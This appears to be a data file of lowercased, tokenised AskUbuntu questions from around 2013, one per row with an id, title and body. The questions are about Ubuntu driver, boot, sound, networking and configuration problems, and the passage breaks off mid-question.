329452	hdmi sound not working on 13.04 kernal 3.9.4 : ( oem-audio-hda-daily-dkms ? )	as reported by many others , hdmi audio does not work for me in 13.04 . it does not even show up in the sound settings . i have tried upgrading the kernal 3.9.4 i have tried updating my nvidia graphics driver i 've tried to boot multiple old kernals using grub menu at startup.. and then tried multiple kernal/graphics driver combinations.. ..but still nothing works ! : ( the only other potential solution i have seen is to update oem-audio-hda-daily-dkms from this site - https : //code.launchpad.net/~ubuntu-audio-dev/+archive/alsa-daily/+packages however , when i try this i get an error : loading new oem-audio-hda-daily-0.201307180559~raring1 dkms files ... first installation : checking all kernels ... building only for 3.9.4-030904-generic building for architecture i686 building initial module for 3.9.4-030904-generic error ! the dkms.conf for this module includes a build_exclusive directive which does not match this kernel/arch . this indicates that it should not be built . dpkg : error processing oem-audio-hda-daily-dkms ( -- configure ) : subprocess installed post-installation script returned error exit status 9 errors were encountered while processing : oem-audio-hda-daily-dkms e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the thing is , my system is not i686 as shown in the error , it is i386 ( as far as i know ) . this is despite choosing the i386 package to install . could this package be the issue ? how can i install it properly ? please help ! thanks ! !
329454	clevo w650sr , nvidia 750m driver problem	i have just bought an clevo w650sr , everything work except the nvidia graphic card . it has nvidia 750m together with a haswell cpu , core i7-4700mq . i have done some research and found out that i need the nvidia 319 driver ( or never ) . so i have tried installing that . i have tried installing it from both the nvidia website , and from the xorg edgers ppa . but i ca n't get it to work . after i have installed the driver , unity is gone , and the gui around the programs . i have tried doing sudo nvidia-xconfig but after this , i just get a 600x480 resolution . if i search in `` additional drivers '' i find nothing . there is noe option in bios to `` hard set '' the gpu to the nvidia one . i have also tried installing bumblebee without any luck . i have also search around on askubuntu , but i ca n't find anyone that have gotten an 750m to work with haswell cpus . installing nvidia driver causes black screen ( 750m ) installing nvidia driver causes black screen ( 750m ) i have tried with ubuntu 12.04 , 13.04 and 13.10 `` beta ''
329455	slapd nsslapd-maxdescriptors	i need to change the maximun file descriptors of my slapd . i have an ubuntu server 12.04 i read that nsslapd-maxdescriptors is the atribute that i must change for that . 多 how can i change nsslapd-maxdescriptors ? thanks for your help
329458	su not properly logged when using byobu	we 're seeing varations in our logs when a user su 's from a byobu session vs. a regular shell session . when using a regular session the lines in /var/log/auth.log look like this : root @ delta : /var/log # tail -n 0 -f auth.log | grep su aug 6 14:15:56 delta sudo : chrish : tty=pts/3 ; pwd=/home/chrish ; user=root ; command=/bin/su aug 6 14:15:56 delta sudo : pam_unix ( sudo : session ) : session opened for user root by chrish ( uid=1000 ) aug 6 14:15:56 delta su [ 29322 ] : successful su for root by root aug 6 14:15:56 delta su [ 29322 ] : + /dev/pts/3 root : root aug 6 14:15:56 delta su [ 29322 ] : pam_unix ( su : session ) : session opened for user root by chrish ( uid=0 ) however , when that user is in a byobu and su 's the lines look as follows : root @ delta : /var/log # tail -n 0 -f auth.log | grep su aug 6 14:14:26 delta sudo : chrish : tty=pts/2 ; pwd=/home/chrish ; user=root ; command=/bin/su aug 6 14:14:26 delta sudo : pam_unix ( sudo : session ) : session opened for user root by ( uid=1000 ) aug 6 14:14:26 delta su [ 27243 ] : successful su for root by root aug 6 14:14:26 delta su [ 27243 ] : + /dev/pts/2 root : root aug 6 14:14:26 delta su [ 27243 ] : pam_unix ( su : session ) : session opened for user root by ( uid=0 ) notice how the lines which say `` session opened for user root by '' do n't include a username like they do above ? is this a misconfiguration or a bug that needs to be reported ? this is causing some of our log monitoring alerts to not fire .
329459	how to enable password prompt at kubuntu system loading ?	when i installed my kubuntu i chose not to ask for a password at system load . now i want to enable that option back , i want kubuntu to prompt my password every system bootstrap . but i can not find this option . where this option is hidden in kubuntu ? ( or in ubuntu , maybe they are similar ) .
329461	install grub2 to usb-drive in order to boot to hdd-installed ubuntu 13.04 x64 in uefi mode	i 've been trying to find a way to install grub2 to a usb drive , in such a way that i can boot a pc in uefi mode into ubuntu , without modifying the uefi firmware settings in any way or replacing the pre-installed windows 7 x64 bootloader with grub . here 's the current gpt partition layout of the internal ssd drive as given by gparted , when run from an ubuntu 13.04 x64 live-dvd session : /dev/sda1 100mb fat32 /boot ( efi system partition ) /dev/sda2 128mb -- - /msfres ( windows 7 reserved partition ) /dev/sda3 100gb ntfs ( windows 7 system partition ) /dev/sda4 10gb ext4 ( ubuntu root '/ ' partition ) so far , i 've tried booting my live-dvd in uefi mode , creating a root partition for ubuntu ( as seen above ) , then telling the installer to put grub on a 512mb usb pen drive ( /dev/sdi ) that i had previously formatted in gparted as follows : 1 ) create a gpt partition layout ; 2 ) create a single primary partition ; 3 ) format the partition as fat32 ; 4 ) set the partition flag as '/boot ' . i instructed the ubuntu installer to install grub to /dev/sdi1 ( the partition i created above -- since the preceding 1mb was unused space ) . however , when i rebooted the pc , after the completion of the ubuntu installer , with the usb pen plugged-in , the firmware boot menu detected the pen as an uefi device but then proceeded to boot windows 7 -- no ubuntu or grub menu . i 've tried google'ing for solutions , and whilst there are many sites that give details on how to dual boot windows and linux on uefi systems , they all assume that you will be able to modify the uefi firmware settings or replace the windows 7 bootloader ( neither option is available to me , as i do n't own the pc ) . therefore , could anyone give me a detailed , step-by-step method of installing grub2 to a usb pen so that i can boot into the ubuntu partition in uefi mode , without changing any of the system firmware settings or modifying/replacing the existing windows 7 bootloader ? the system board is an asus z87-k ( bios rev 0412 ) , the ssd is an 120gb ocz-vertex3 ( firmware rev 2.15 ) an update : it turns out that my uefi firmware does have secure boot enabled ( because windows 7 ( and other oses in 'live mode ' ) booted fine , i assumed it was turned off ) . my apologies if i 've been leading people up the wrong path ! since i do n't own this pc , i ca n't turn secure boot off , so i will have to abandon the attempt at an ubuntu installation for now . although , according to the canonical documentation , ubuntu 12.04.2 and later should be able to boot on a pc with secure boot enabled ? since i ca n't disable secure boot to narrow-down the problem which is preventing me from successfully booting ubuntu , i 'll leave this question open , but any future installations i attempt will be done on my own hardware so i have the freedom to experiment in greater depth . thanks , once again , to all who responded !
329469	how to kill kde screensaver from command line	sometimes lock-screen just ca n't be unlocked in kde , so i have to kill it from tty . update : in 4.13 plasma-overlay always respawns . any other way ?
329473	will there be ubuntu compatibility with amd cpu / processor : samsung exynos 5 dual soon ?	will there be ubuntu compatibility with amd cpu / processor : samsung exynos 5 dual soon ? i realize the chromebook is recently out , but i would appreciate knowing if it 's in the works .
329480	bumblebee screwed up unity . ca n't even do a reinstall to get it back	i have a macbook pro 6,2 with both intel integrated graphics and nvidia 330m . i was trying to get my external monitor to work in order to extend my display , but the proprietary drivers just gave me a black screen . i then looked into solutions for hybrid graphics . not knowing if it was right for my computer , i took the risk and installed bumblebee . it messed up everything , even after i did a purge . now i just get text-only mode , where it asks for my login/password and then just goes into shell mode . typing startx at the prompt produces an error , as well as typing `` unity '' here is my xorg.0.log : http : //paste.ubuntu.com/5955911/ the live cd works fine . this used to work fine before i installed bumblebee . i even tried doing a fresh install , and it still gave me these results . so far i have tried : forcing nouveau drivers by creating a folder and following directions at the end of http : //nouveau.freedesktop.org/wiki/installnouveau/ . using an older kernel from grub purging nvidia drivers reinstalling/updating intel drivers
329484	best distribution for classroom instruction	what is the best ubuntu distribution for classroom instruction to teach linux basics ? -- more details : i have been using linux as a single user for many years and have been pushing my university to make a linux box available for student use ( and classroom instruction ) . they are willing to install ubuntu on a single server hosted on windows azure . i will have about 20-25 undergraduate cs students who may access this system concurrently ( though it is doubtful they would be doing anything computationally intensive , mostly just simple scripting , perhaps some basic socket/networking programming and gaining familiarity with linux ) . is there a particular distribution of ubuntu i should ask to be installed ? i 've always gone with the desktop version , should i go for the `` server '' version here ? 13.04 or 12.04 lts ? i hope to keep this around somewhat permanently if it works out ( i.e. , i want persistent file storage/configuration etc over time , not a live cd approach where everything gets lost/reset between sessions ) . i will want to have all the regular development tools ( compilers , editors etc ) available . is there something special that i need to be aware of with this setup involving azure ? thanks - my experience is really only one from a single-user perspective , nor am i familiar with windows azure
329486	dualboot windows 8 and ubuntu 13.4 no sign of grub	i have installed ubuntu several times now , but i am never able to boot in that partition . my uefi/bios does not recognize it , and every boot option i have chosen leads to windows booting . there is no sign that grub has even installed ; ubuntu is just sitting there unable to be used . i have an asus m5a99fx pro r2.0 mobo if that helps . additionally windows is installed to a 120gb ssd and ubuntu to a ~60gb partition on a 1tb hdd ( i could not install it to my ssd ) .
329489	ca n't browse secure sites , not chrome firefox or opera	i ca n't browse any secure site in ubuntu 13.04 . and i mean any site ! even when sites use somethings like google analytics , https , css or javascript or something , i have to refresh sometimes to see the site . for example , i ca n't visit gmail , but i can browse the same site on a windows 8 machine running through qemu on this ubuntu ! i could visit https sites before , but beginning some days ago , i ca n't . any help is appreciated .
329492	how to install ubuntu on a tablet ?	i have a tablet that runs android ice cream sandwich and would like to convert it to run ubuntu as the operating system . how easy is it to re install a tablet with ubuntu ? the tablet is an model n900 cpu allwinner a13 fsb 1.5ghz os android 4.0 ics memory 512mb ddr3 nandflash 8gb extended tf card ; u disk , support tf card up to 32gb max lcd display 9 inch capacitive screen , 800*480 internet built-in ethernet , support wifi ( 802.11 a/b/g/n ) 3g support external 3g module camera front camera 0.3mp i/o ports usb port , headphone jack , tf card slot touch screen 5-point capacitive touch screen
329494	what are ubuntu one conflicts and how do i resolve them ?	sometimes there appear files with the .conflict extension on the folders synchronized with ubuntu one . why does that happen and what should i do with the conflicts ?
329496	wary of locked windows 8 bios	i 've been looking for a good inexpensive laptop to purchase and throw linux on , but when i was in line to purchase one , the store rep mentioned that its bios was locked to windows 8 , and that linux would n't install on it . is this true of some laptops ? if so , how can i be certain that a laptop i buy has an unlocked bios that allows me to install linux ? thanks so much for you help !
329499	how do i delete my ubuntu one account ?	if i no longer want my ubuntu one account , can i delete it ?
329503	changing y/n prompt in cli	i am using ubuntu 12.04.02 lts server . i want to change the prompt message `` do you want to continue '' to `` is this desirable ? '' how would i do that ?
329505	how do i make an executable java archive run automatically when i login ?	how do i make a executable java archive run automatically in ubuntu 12.04 lts ? i tried going to the start menu and then clicking on start up applications , but when i restarted my computer to see if it worked , i found that it did n't start the program automatically . if it helps , i want to run minecraft automatically on start up . please help -dkino14
329509	how to go back using unity	today i have found some errors with the update manager system . i believed they were sorted out but on restart , i found that the system is showing `` unity fallback '' instead of the usual unity . a few setting changes have been reverted back to defaults and i miss a few apps such as terminal , compiz , hplip and the software centre . initially i missed unity too , but i have it up and running after reinstalling it and changing the video card driver . workspace lens has disappeared . i miss some plugins such as flash for firefox , and its tabs settings have been changed too . although i am not using fallback mode any more , there are a few apps and settings that i ca n't revert to what i used to have . is there any solution ?
329510	hdmi with opensource drivers ( radeon )	my system ( e45m1-i deluxe with amd onboard graphics with 4gb ram ) running ubuntu 12.04 . my problem is i have no hdmi sound if using the opensource drivers instead of fglrx . i tried : to remove and purge all alsa-base and pulseaudio packages and reinstalling alsa . resetting audio settings with dpkg -- configuration -a adding grub_cmdline_linux_default= '' quiet splash radeon.audio=1 '' to grub config enabling the device via alsamixer , although i only see s/pdif instead of hdmi editing asound.conf with the card and device number i uploaded all sound based info via alsa-info here are there recommended steps to go about installing hdmi sound ?
329517	ca n't access my hdd	i just installed ubuntu 13.04 , first time trying out ubuntu . its dual install , i have windows 8 on my computer also . the problem is i got four hdd , and i see them , but when i try to click on them . nothing happens . error mounting , the disk contains an unclean file system , metadata kept in windows cache . iâve googled my ass off and tried out everything , but it never seems to be addressing exactly my problem . so i ask you , how can i fix this : )
329521	blank screen after logout ubuntu 13.04	i have recently installed ubuntu 13.04 x64 on a 2013 uefi laptop which was running win8 . now i only have ubuntu 13.04 . the distribution is working well in most case . however , a few seconds after i logout , i see a blank screen . after a few seconds , i can hear the dum-dum sound . if i press on my num lk key or capslk , the light indicator still works . i can not suspend either . i suspect it is a display error , since my laptop has only the 1600x900 res . thank you . here are some of my specs : processor 2x intel ( r ) pentium ( r ) cpu 2020m @ 2.40ghz memory 3914mb ( 1554mb used ) operating system ubuntu 13.04
329524	auto backup when usb drive inserted	if this is not the best place to post this question , can you please direct me to a more appropriate place to post this . what i am trying to do : i have a usb drive , it is fat32 and its name is javaclasses . whenever i plug it in it is mounted and its accessable path is /media/bill/javaclasses . i have a script that when i run it , it checks to see if the javaclasses directory exists , if it does , it will make a directory with this format , yyyymmddhhmm . then the script will copy ( backup ) my eclipse directory to this new directory . i have created a new rule under /etc/udev/rules.d/85-javaclasses.rules . this will launch the above script . the script has a 2 second delay to allow the mounting . current situation : the script runs fine if i run in manualy . it does not run automaticly when the drive is pluged in . the command line and info : this is the command in the 85-javaclasses.rules . subsystems== '' usb '' , action== '' add '' , attrs { idvendor } == '' 0930 '' , attrs { idproduct } == '' 6545 '' , run+= '' /home/bill/bin/javaclasses.sh '' this is what i get when i run udevadm info -- attribute-walk -- name /dev/sdb1 looking at parent device '/devices/pci0000:00/0000:00:07.0/0000:04:00.0/usb10/10-1/10-1.4 ' : kernels== '' 10-1.4 '' subsystems== '' usb '' drivers== '' usb '' attrs { bdevicesubclass } == '' 00 '' attrs { bdeviceprotocol } == '' 00 '' attrs { devpath } == '' 1.4 '' attrs { idvendor } == '' 0930 '' attrs { speed } == '' 480 '' attrs { bnuminterfaces } == '' 1 '' attrs { bconfigurationvalue } == '' 1 '' attrs { bmaxpacketsize0 } == '' 64 '' attrs { busnum } == '' 10 '' attrs { devnum } == '' 4 '' attrs { configuration } == '' '' attrs { bmaxpower } == '' 200ma '' attrs { authorized } == '' 1 '' attrs { bmattributes } == '' 80 '' attrs { bnumconfigurations } == '' 1 '' attrs { maxchild } == '' 0 '' attrs { bcddevice } == '' 0100 '' attrs { avoid_reset_quirk } == '' 0 '' attrs { quirks } == '' 0x0 '' attrs { serial } == '' 001a4d5e4020ed5199130595 '' attrs { version } == '' 2.00 '' attrs { urbnum } == '' 2197 '' attrs { ltm_capable } == '' no '' attrs { manufacturer } == '' kingston '' attrs { removable } == '' unknown '' attrs { idproduct } == '' 6545 '' attrs { bdeviceclass } == '' 00 '' attrs { product } == '' datatraveler 2.0 '' can anyone point me in a direction to have this resolved . thank you for your time .
329527	what version of ubuntu 12.04 should i use ?	i have a amd 32-bit operating system , should i use the 32 bit or 64 bit download ? ( the reason i ask is because the 64 bit download is labeled amd , and the 32 bit is labeled intel . but mine is both amd and 32 bit , so im a bit confused on which one to use . ) thanks !
329528	how do i setup php and mysql cronjobs on ubuntu 12.04 server ?	just made a lamp install adn got sftp working . my question now is how do i setup cronjobs in ubuntu server ? i need to make some cronjobs for my php/mysql application . look for un-activated users in my mysql table and delete them etc . also a big ubuntu newbie : ( thanks !
329530	change lightdm display resolution on the console	i am booting from the lubuntu live-desktop-cd but the resolution doese n't work on my powerpc mac g4 . i can go to the cconsole with ctrl+alt+f1 is there a config file for lightdm that i could change the resolution to just 600x800 for testing purposes ? then i could restart lightdem with /etc/init.d/lightdm restart
329534	digikam 3.3.0 install	so let me start by saying i 'm new to ubuntu and am yet to successfully install anything from a tarball ... i 'm trying to install the digikam 3.3.0 software package and after finally getting open cv 4.2.6 to install ( which gave me a lot of problems when initially trying to install this digikam 3.3.0 ) i 'm getting this message after : sudo checkinstall -- pkgname=digikam3.2 -- install=no make install i get this message : scanning dependencies of target kface [ 3 % ] building cxx object extra/libkface/libkface/cmakefiles/kface.dir/kface_automoc.cpp.o make [ 2 ] : * no rule to make target /usr/lib/libopencv_calib3d.so ' , needed bylib/libkface.so.2.0.0 ' . stop . make1 : [ extra/libkface/libkface/cmakefiles/kface.dir/all ] error 2 make : ** [ all ] error 2 ** installation failed . aborting package creation . restoring overwritten files from backup ... ok cleaning up ... ok bye . any ideas how i can fix this ? btw i 'm using this as a guide to install digikam ... http : //dia-scan.blogspot.com/2013/06/how-to-compile-digikam-32-on-ubuntu-1204.html thanks !
329537	brightness control does n't work acer aspire 5738 13.04	i have tried many suggested solutions modifying , still nothing works . ubuntu 13.04.acer aspire 5738 . please help its very annoying and frustrating ca n't control a basic function . thanks
329538	how do i get windows back ?	how do i get windows back ? i do n't know how , i know ubuntu is good and all , i really want to get windows back ? like i want to delete the ubuntu partition okay ?
329539	installation via grub in disk	i tried to install linuxmint in xubuntu by following steps : editing /etc/grub.d/40_custom , add following contents to the bottom of the file : menuentry “live mint” { insmod loopback loopback loop ( hd0,6 ) /mint14.iso linux ( loop ) /casper/vmlinuz boot=casper iso-scan/filename=/mint14.iso initrd ( loop ) /casper/initrd.lz } sudo update-grub when i execute this command , console didn’t show “found linux mint” message . what’s wrong ? and anyone can use this method to install linux sucessfully ? thanks
329541	no unity , ca n't send bug report	after updating today , 13.04 no longer shows unity panels . i tried the guide to reporting from console , but it always shows `` please fill out the form in the automatically opened web browser '' . is there no way to finish reporting a bug from console , or another computer ? https : //help.ubuntu.com/10.04/serverguide/reporting-bugs.html btw ctrl+alt+t works for me , when the keyboard input does n't go to pidgin , that is . ubuntu-bug /var/crash/_usr_bin_compiz.1000.crash does not pop up a browser window . i tried this , and it does n't help , i still have the same problem after resetting . how do i reset my unity configuration ? does this happen on all machines with intel mobile gm965/gl960 integrated graphics controller ? -- update -- i 've filed a bug report , it is now marked as `` high '' importance , triaged . the question is , how old of a computer is `` supported '' with the latest releases of ubuntu ? this machine has also been affected by the jittery titles in chromium bug , and a general slowness that made me wonder how supported the graphics-card was . i 've seen much older ( p4 era ) computers running 12.x ubuntu , but i suppose the newer releases do n't go through as much testing on even 5-year-old machines ? is there any documentation on what qa practices ubuntu uses on updates , and major distribution upgrades ?
329548	ca n't boot into gui after removing ubuntu desktop to get pure lubuntu	i followed the instructions at this site to get pure lubuntu . unfortunately , after doing so my computer will no longer boot into the gui . i 'm able to switch over to a terminal just fine , but the gui never comes up . the computer boots past the lubuntu splash screen and then displays : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername * starting web server apache2 etc/rc2.d/s99acpi-support : line 7 : /usr/share/acpi-support/power-funcs : no such file or directory it seems to be stuck there . yesterday , i let the computer run for 24 hours . when i came back , the whole screen was full of code . i did n't catch any of it though . i attempted to restart from a live usb , but the computer would n't even recognize it . i tried it in every port but i ca n't get it to show up on the boot menu . i was able to ctrl+alt+f6 to a terminal . i tried : sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install -- reinstall lubuntu-desktop i also tried sudo apt-get install -f. none of this helped . now it 's just back to the aforementioned apache2 error message . another oddity : i can reboot the computer from the terminal using sudo reboot but when i attempt sudo shutdown now it pumps out a ton of error messages , switches to single user mode , and waits for a command . how can i get my gui back ? update : i realized that i was stupidly trying to boot a computer with uefi using an x86 usb . it boots from a live usb using the 64-bit live usb .
329549	touchpad right click not working in 13.04 , asus b400a-xh51	i 've just put ubuntu 13.04 on my asus b400a-xh51 laptop and am having a problem with the touchpad : it has discrete left and right buttons , and the left one works fine , but the right one does nothing when pressed . ( i can still do a right click by using a two-finger tap , although i would rather disable tapping and just use the discrete buttons . ) also , if i put my finger on the lower-right area of the touchpad while clicking the discrete left button , it acts as a right-click -- as though ubuntu thinks it is a clickpad . any ideas for how to make the right button work ? ( similar to an issue with asus g46vw : ordinary two-button touchpad incorrectly detected as clickpad ) here is the output of `` xinput -- list '' ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ usb2.0 hd uvc webcam id=10 [ slave keyboard ( 3 ) ] ↳ asus wmi hotkeys id=11 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ]
329555	ubuntu 12.04 frozen	i installed ubuntu 12.04. when i went to update manager , it showed over 300 updates . when i hit updates , it started to with waiting and that small circle going round and round . i waited 1 hour and then the computer shut down still waiting . when i started the computer the arrow disapearred , my whole computer is practically frozen . when i try to shut down , it goes back to enter password position
329561	installed applications not working after upgrade to 13.04	i just upgraded from 12.04 to 13.04 and now none of my installed applications work . a few of the affected programs include ktorrent , chrome , and deluge . apt says that i already have the newest version installed but starting from the command line that the program is not currently installed and directs me to use apt-get to install . i suspect that the programs are installed but ubuntu does n't know they are installed . any help would be greatly appreciated . thanks , ryan
329562	truecrypt distribution with my software	i 've developed software that makes command line calls to a standard volume in truecrypt 7.1a . i 've included this volume in my software for distribution . i intend to release my software for free use and distribution . i 've read ( to the best of my ability ) truecrypts license . what i 'm unsure about is legal distribution of my software with truecrypt in the way i 'm using it . my implementation of truecrypt is unmodified and would be used like anyone else would that downloaded it . the only thing i '' ve down is setup the volume and provide guidelines so it can be used in my software without errors . does anyone have a clear understanding of truecrypts legal use in this way ? thanks
329564	dropbox nas replication through ubuntu server 12.04	background i have a d-link dns-320 nas which works well to provide smb shares but not much else . i have mounted the volumes on my nas to my ubuntu server 12.04 vm which runs as production for me for several internal and external sites . my own documents , pictures , etc ... i moved to the nas some time ago to a folder on my own name . dropbox i have since installed dropbox and made it into a daemon by following another article and this resulted in my user 's home folder having a new folder called dropbox inside which replicates without issue . my problems comes from that inside that folder i created a soft link called documents to the folder named after me on my nas through the mount . i.e . /home/user/dropbox/documents - > /mnt/nas1/vol1/files/user problem now whenever i reboot it seems to me like the nas is not mounting before dropbox kicks in because rebooting the ubuntu server causes dropbox to wipe all my files . then if i ssh in and run their python script to restart dropbox then it finds everything ( almost everything ) again and starts to upload it . this back and forth is causing me issues and to loose some of my files . current status i have for now disabled the dropbox daomon on my ubuntu server and i am currently working with dropbox to try to restore all of my files . once i have done this , i need to come up with a better method . original idea my original idea was that dropbox would simply replicate all of my documents and allow not only everything to be synced between smart phones , tables , laptops , and desktops , but for me to also keep a synced copy on my nas for backup purposes . clearly at this point i can not do this if i can not fix the above issue so i am reaching out for some help and i would welcome ideas .
329566	ubuntu wo n't run from usb on only one of 3 machines	i get the screen to choose run from usb . then the ubuntu loading screen for about a minute , with mouse active . then my monitor goes to sleep , means no signal . i 'm using `` universal-usb-installer-1.9.3.9.exe '' and `` ubuntu-12.04.2-desktop-i386.iso '' . the usb is an 8 gb kingston and on a desktop system with the same motherboard , both 32 bit , works fine . also works on my wife 's laptop . mine has xp , theirs have 7 . what do n't i know ?
329570	check if torrent file is complete before copying	i have a crontab command that daily copies .iso files found within my torrents folder into an iso directory on a separate partition . my problem is that multiple .iso files will still be in the process of downloading when the crontab command executes which results in incomplete .iso files which obviously can cause issues when trying to use said .iso files . is there a bash command or module in python that can check whether a torrented file has been completely downloaded ? or possibly to query qbittorrent ( my torrent client ) to find whether the torrent has completed ? any help would be much appreciated .
329579	how to install amd catalyst or amd graphic drivers and other drivers in ubuntu 13.04	i recently purchased an hp laptop ( intel-amd hybrid ) . i successfully installed ubuntu 13.04 on it . but my battery is draining quite quickly . it hardly works for 30-50 minutes . i guess it might be due to the graphics driver . could anyone please suggest how to install below , recommended settings to increase battery life and performance of my laptop : 1 . amd driver / amd catalyst for amd hd raedon 5400 2 . synaptics touch pad driver 3 . idt high definition audio driver
329584	deleted ubuntu , then windows 7 , now windows is not booting from cd	i installed a dual operating system ( ubuntu 9 and windows 7 ) . unknowingly i deleted ubuntu partition . then there comes the grub rescue error . after that i again installed ubuntu from live cd and during installation erased the windows 7 partition from my hard disk . now i am trying to install windows 7 but it does n't boot . this time i have only ubuntu installed on my laptop . i want to remove all this ubuntu etc and i want to install windows 7 only .
329586	steps to recover lost files and data in ubuntu 12.04	recentlly i have installed ubuntu 12.04 and got to used with it , but suddenly bymistake i deleted few data and files , so could you please tell me how to recovery the last data with steps .
329604	sublime text launcher not working	a weird thing about sublime text 2 installed i installed sublime text , followed above link and created sublime.desktop in my /usr/share/applications folder . i edited it as suggested . this is what is present in that file ( after editing ) . [ desktop entry ] version=1.0 name=sublime text 2 * # only kde 4 seems to use genericname , so we reuse the kde strings . * * # from ubuntu 's language-pack-kde-xx-base packages , version 9.04-20090413 . * genericname=text editor exec=sublime terminal=false icon=/usr/lib/sublime text 2/icon/48x48/sublime_text.png type=application categories=texteditor ; ide ; development x-ayatana-desktop-shortcuts=newwindow [ newwindow shortcut group ] name=new window exec= '' /opt/sublime\ text\ 2 /sublime_text '' -- new-window targetenvironment=unity even now , the launcher icon is not working . how do i solve this issue ? specifications : ubuntu 12.04lts and unity
329606	integration of a tag based file system approach in gnome and nautilus	i am using gnome 3.8 and nautilus and i am quite satisfied in principle . yet i dislike the traditional hierarchical file system approach using paths . it may be me but i often can not find the files i am looking for in a short period of time . thus i would like to transition to a tag based file system . now i am curious . are there any tag based approaches , programs that do integrate neatly into nautilus and gnome ? with which one did you have good experiences ?
329608	how to have the console echo ( confirm ) some commands ?	i have ubuntu installed on several machines , and i 'd like to replicate the behavior of the console i found on one of them in all my installs ( they 're all 12.04 , 64 and 32 bits ) . i installed ubuntu studio 12.04 ( 'lowlatency ' ) several months ago , and maybe i did something back then , maybe i did n't , but i get a kind of `` echo '' of all the commands for which i find it 's important to have one ( like rm , rmdir , ln , cp and mv ) . i 'm also prompted to confirm the rm type of commands , which i think is great even though a little annnoying sometimes ... anyway , when i do n't want to be bothered i just add a -f and all is well . here is an example with cp : foo @ bar : /tmp $ cp hello.txt world.txt `hello.txt` - > `world.txt` same goes with mv . i 'm fairly sure i did n't configure it myself , so i think it 's a default behavior . i 'd like to do the same on other machines , and why not even control the whole thing manually and decide which commands get an echo or not if possible . i suspect this has something to do with the ~/.bashrc file , but that 's about as far as i can get on my own . how can i make some commands echo some feedback ( like ln , cp , mv ) and other prompt for confirmation ( like rm and rmdir ) in the console ?
329614	how to make a script which always activates on the startup ?	so i 'd like to add always a folder to the path . i 'm not a huge linux wizard but i think i would need to always write the `` export path= $ path : ( directory ) '' line when i log in . but i need this to be on when i 'm starting up , and i do n't want to bother with terminal everytime . so looking into it a little , i found that i should add that to .bash_profile even though i 'm not sure what it is or where it 's located . in the home directory there 's only a .bashrc file . hope you can help me , thanks
329618	is there any canonical chat messenger working both in android and ubuntu ?	my friend is in china and she is using android phone . now i use ubuntu.and in there facebook is blocked.and , kik , wechat does n't work in pc laptop . i do n't have an android . so is there any chat messenger which can work in both her android in china and i can use in ubuntu ? i am seeing pidgin for android.. but it 's not free .
329621	ubuntu 13.04 with wubi works	i do n't know if i 'm the only person to find this out or not . but anyways i like the way wubi works so i was kind of mad that 13.04 did n't have it . but i was playing around , and i downloaded the ubuntu 13.04 iso file and i extracted it to a folder , and surely enough after i extracted it , i went to that folder and in that folder i found awubi.exe so i double clicked it and it worked ! now i 'm running ubuntu 13.04 off of a wubi install and it works perfectly fine for me . this shocked me because i thought they had gotten rid of wubi installs after 12.04 but i guess it 's still possible . i thought i would just share this with everybody .
329630	why is source command not being run in .bashrc	i have a source command which i have to manually run every time i open a new terminal . source /opt/ros/groovy/setup.bash thus i added the command into the .bashrc file . however the does not seem to been ran as i still need to manually run the command for my application to function properly . i have added a echo command to ensure the the .bashrc file is being ran by the the terminal and it seem to be the case . thanks in advance
329634	how to detect thinkpad t530 volume up and down keys ?	i 'm using my logitech m510 mouse 's scroll buttons ( left & right ) to change the volume level . using xbindkeys i can set them with command like this : amixer -c 0 set master playback 2db+ unmute but these amixer commands does n't show the volume popup and they also does n't maximize the volume to it 's maximum . this happens because in sound setting i saw that the sign for 100 % is not at the end of the slider but around the 80 . so , how can i detect the buttons for volume up and down from the keyboard . then with xbindkeys i will bind my mouse buttons to work like them . xev does n't show anything when pressing the buttons from the keyboard . instead of this they are working fine with linux , just not detected by xev and i ca n't get the key number for using in xbindkeys .
329635	pidgin systray disappeared suddenly in 13.04 with unity	about since a week only the pidgin systray disappeared ( maybe after an ubuntu update ) . pidgin works well , but it can be seen only in the message indicator . i tried restart unity , i tried reboot , but nothing helped . i used 13.04 . the required configs have been set . any idea ? i could not find anything about it . thx !
329639	my brightness control buttons are not working on my packard bell netbook	i have a packard bell dot s netbook . first i installed ubuntu on it . i noticed that i could n't use my brightness control buttons ( f11 f12 ) . i saw the little bar like it is changing its brightness , but actually it did nothing . then i found a command line : sudo gedit /etc/default/grub and there i edited this line : grub_cmdline_linux_default= '' quiet splash '' after it just worked perfectly , but sadly my wifi went wonky and i could n't use it actually on ubuntu so i decided to get lubuntu . everything was fine with it , but still i can not use the brightness buttons . i tried the previous method , but it just says : sudo : gedit : command not found i looked for another solution , and i found this line : sudo sed 's/grub_cmdline_linux_default= '' quiet splash '' /grub_cmdline_linux_default= '' quiet splash acpi_osi= '' / ' -i /etc/default/grub before that , i saw the same thing as in ubuntu : saw the bar is changing , but actually no change in the brightness . so i tried this method , rebooted , and now even that bar has disappeared . at least help me to get back to the point i started . but ultimately i 'd like to use my brightness control buttons !
329641	openvpn server on ubuntu and clients on windows	i would like to setup a small vpn server for a remote office of my company . the goal is to be able to access its network either from the corp network or from home . most of ( if not all ) clients will be running windows ( > =7 ) . to reduce costs , i want to reuse an old computer , where i setup ubuntu server 13.04 . i 've followed openvpn documention on ubuntu web site . i 've been able to deploy the packages . however , my general linux knowledge is limited , and i 'm stuck at setting up the different configuration file . basically i have : an internet connection , with a modem that have basic router features : dhcp server , nat translation , and port forwarding . a single network 192.168.100.0/24 where all computers are connected , including the internet modem and the vpn server ( this server has only one network card ) . my questions are : the openvpn tutorials and sample config file i found are mentioning route configuration , ethernet bridging , etc . i admit i do n't understand what i 'm suppose to do . i simply want to grant access to the whole local network when a client connects ? as my clients will be mostly windows client , what specific configuration i 'm supposed to apply in the server.conf file ? is there any sample configuration file specific to my scenario ? am i stuck to openvpn client ? is there any chance to be able to use the native vpn client features of windows ( 